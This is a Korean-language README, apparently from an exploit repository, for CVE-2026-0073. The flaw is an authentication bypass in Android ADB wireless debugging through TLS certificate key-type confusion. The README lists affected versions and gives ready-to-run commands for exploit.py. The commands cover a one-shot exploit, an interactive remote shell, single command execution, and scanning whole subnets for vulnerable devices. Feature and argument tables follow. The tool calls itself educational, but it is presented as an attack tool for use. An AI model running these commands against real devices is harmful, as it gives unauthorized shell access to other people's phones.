
🚀 CVE-2026-0073 - Android ADB 무선 디버깅 익스플로잇 (CVSS 8.8) 🔓 TLS 유형 혼동을 통한 제로 클릭 인증 우회. 대화형 셸 획득, 명령 실행, 네트워크 스캔. 교육용 레드팀 도구. 🐚⚡

제로 클릭 | 원격 셸 | 네트워크 스캐너 | 교육용 보안 연구 도구
CVE-2026-0073은 Android의 ADB 데몬에서 무선 디버깅에 영향을 미치는 Android 11+ 기기의 중요한 인증 우회 취약점입니다. 이 결함은 EVP_PKEY_cmp()의 타입 혼동으로 인해 RSA 키로 구성된 기기에 EC P-256 또는 Ed25519 인증서를 제시하여 인증을 우회할 수 있는 TLS 인증서 검증 로직에 존재합니다.
본 PoC는 공인된 보안 연구 및 교육 목적으로만 취약점을 시연합니다.
| Android 버전 | 영향 여부 |
|---|---|
| Android 14 | ✅ 예 |
| Android 15 | ✅ 예 |
| Android 16 | ✅ 예 |
| Android 13- | ❌ 아니오 |
패치: Android 보안 게시판 2026-05-01
#Basic - One Shot Exploit
python exploit.py --target 192.168.1.100
#Interactive Shell
python exploit.py -t 192.168.1.100 -i
#Execute Single Command
python exploit.py -t 192.168.1.100 -c "id" -o result.txt
#Scan Entire Network
python exploit.py --scan --interface eth0
#Manual Port + Verbose
python exploit.py -t 192.168.1.100 -p 39311 -v
#Ed25519 Certificate
python exploit.py -t 192.168.1.100 --key-type ed25519
#Non-Interactive Mode (Exit After Command)
python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
다른 익스플로잇 저장소를 확인하세요:
| 기능 | 설명 |
|---|
| 🔍 스마트 포트 검색 | 자동으로 30000-50000 범위 및 일반 포트 스캔, CNXN 핸드셰이크를 통해 ADB 확인 |
| 🔐 TLS 1.3 우회 | 인증 우회를 위해 EVP_PKEY_cmp()의 타입 혼동 악용 |
| 🎨 이중 키 지원 | EC P-256(기본값) 또는 Ed25519 인증서 |
| 🐚 대화형 셸 | 스레드 기반 I/O를 통한 전체 터미널 액세스 |
| ⚡ 단일 명령 모드 | 하나의 명령을 실행하고 종료 - 스크립팅에 적합 |
| 📡 네트워크 스캐너 | 취약한 기기를 위해 전체 서브넷 스캔 |
| 🔄 자동 재시도 | 지수 백오프 + 설정 가능한 최대 재시도 |
| 🎯 수동 포트 재정의 | 자동 검색 실패 시 포트 지정 |
| 📁 출력 캡처 | 명령 결과를 파일로 저장 |
| 🎨 색상화된 출력 | colorama를 통한 전문적인 시각적 피드백 |
| 🪵 상세 디버그 | 문제 해결을 위한 상세 로깅 |
| 🔌 프록시 지원 | HTTP/HTTPS 프록시 호환성 |
| 🧵 스레드 셸 | 비차단 대화형 세션 |
| 인수 | 약어 | 기본값 | 설명 |
|---|
--target | -t | 없음 | 대상 IP 주소 |
--port | -p | 자동 | 무선 디버깅 포트 |
--command | -c | 없음 | 단일 명령 실행 |
--output | -o | 없음 | 출력을 파일로 저장 |
--verbose | -v | False | 디버그 로깅 활성화 |
--interactive | -i | True | 대화형 셸 모드 |
--no-interactive | - | False | 명령 실행 후 종료 |
--scan | - | False | 취약한 기기 스캔 |
--interface | - | 없음 | 스캔용 네트워크 인터페이스 |
--key-type | - | ec | 인증서 유형 (ec 또는 ed25519) |
--max-retries | - | 3 | 최대 재시도 횟수 |
--no-auto-port | - | False | 자동 포트 검색 비활성화 |